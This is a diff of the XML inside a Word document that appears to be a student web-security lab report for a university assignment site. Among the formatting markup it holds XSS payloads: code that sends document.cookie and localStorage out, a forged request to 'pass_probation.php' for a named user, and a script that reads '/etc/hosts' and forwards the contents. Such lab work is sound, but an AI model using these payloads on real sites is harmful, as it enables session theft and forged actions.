+              </w:rPr>
+              <w:t>(document) +</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    "&amp;cookie=" + </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>document.cookie</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> +</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    "&amp;</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>localStorage</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">=" + </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>JSON.stringify</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>localStorage</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>));</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>xhttp.send</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>();</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -13643,6 +15620,7 @@
             </w:pPr>
             <w:r>
               <w:rPr>
+                <w:noProof/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:drawing>
@@ -13661,7 +15639,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId19"/>
+                          <a:blip r:embed="rId22"/>
                           <a:stretch>
                             <a:fillRect/>
                           </a:stretch>
@@ -13758,6 +15736,7 @@
             </w:pPr>
             <w:r>
               <w:rPr>
+                <w:noProof/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
               <w:drawing>
@@ -13776,7 +15755,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId20"/>
+                          <a:blip r:embed="rId23"/>
                           <a:stretch>
                             <a:fillRect/>
                           </a:stretch>
@@ -13816,7 +15795,7 @@
               </w:rPr>
               <w:t xml:space="preserve">isiting </w:t>
             </w:r>
-            <w:hyperlink r:id="rId21" w:history="1">
+            <w:hyperlink r:id="rId24" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="Hyperlink"/>
@@ -13894,6 +15873,7 @@
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -13910,7 +15890,17 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">!-- </w:t>
+              <w:t>!--</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -13975,45 +15965,149 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">  var xhr = new XMLHttpRequest();</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  xhr.onload = function () {</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    var xhr2 = new XMLHttpRequest();</w:t>
+              <w:t xml:space="preserve">  var </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>xhr</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> = new </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>XMLHttpRequest</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>xhr.onload</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> = function () {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    var xhr2 = new </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>XMLHttpRequest</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>);</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -14062,14 +16156,27 @@
               </w:rPr>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>this.responseText);</w:t>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>this.responseText</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>);</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -14107,26 +16214,70 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">  xhr.open("GET", "http://assignment-hermes.unimelb.life/pass_probation.php?user=xiandew");</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  xhr.send();</w:t>
+              <w:t xml:space="preserve">  </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>xhr.open</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>("GET", "http://assignment-hermes.unimelb.life/pass_probation.php?user=xiandew");</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>xhr.send</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>();</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -14227,7 +16378,21 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>the user “xiandew”</w:t>
+              <w:t>the user “</w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>xiandew</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>”</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -14305,7 +16470,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId22"/>
+                          <a:blip r:embed="rId25"/>
                           <a:stretch>
                             <a:fillRect/>
                           </a:stretch>
@@ -14379,7 +16544,7 @@
                           <pic:cNvPicPr/>
                         </pic:nvPicPr>
                         <pic:blipFill>
-                          <a:blip r:embed="rId23"/>
+                          <a:blip r:embed="rId26"/>
                           <a:stretch>
                             <a:fillRect/>
                           </a:stretch>
@@ -14635,6 +16800,7 @@
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
             </w:pPr>
+            <w:proofErr w:type="gramStart"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New" w:hint="eastAsia"/>
@@ -14651,7 +16817,17 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">!-- </w:t>
+              <w:t>!--</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -14698,45 +16874,149 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">  var xhr = new XMLHttpRequest();</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  xhr.onload = function () {</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">    var xhr2 = new XMLHttpRequest();</w:t>
+              <w:t xml:space="preserve">  var </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>xhr</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> = new </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>XMLHttpRequest</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>xhr.onload</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> = function () {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    var xhr2 = new </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>XMLHttpRequest</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>);</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -14774,7 +17054,29 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">    xhr2.send("test=" + this.responseText);</w:t>
+              <w:t xml:space="preserve">    xhr2.send("test=" + </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>this.responseText</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>);</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -14812,26 +17114,70 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">  xhr.open("GET", "/etc/hosts");</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">  xhr.send();</w:t>
+              <w:t xml:space="preserve">  </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
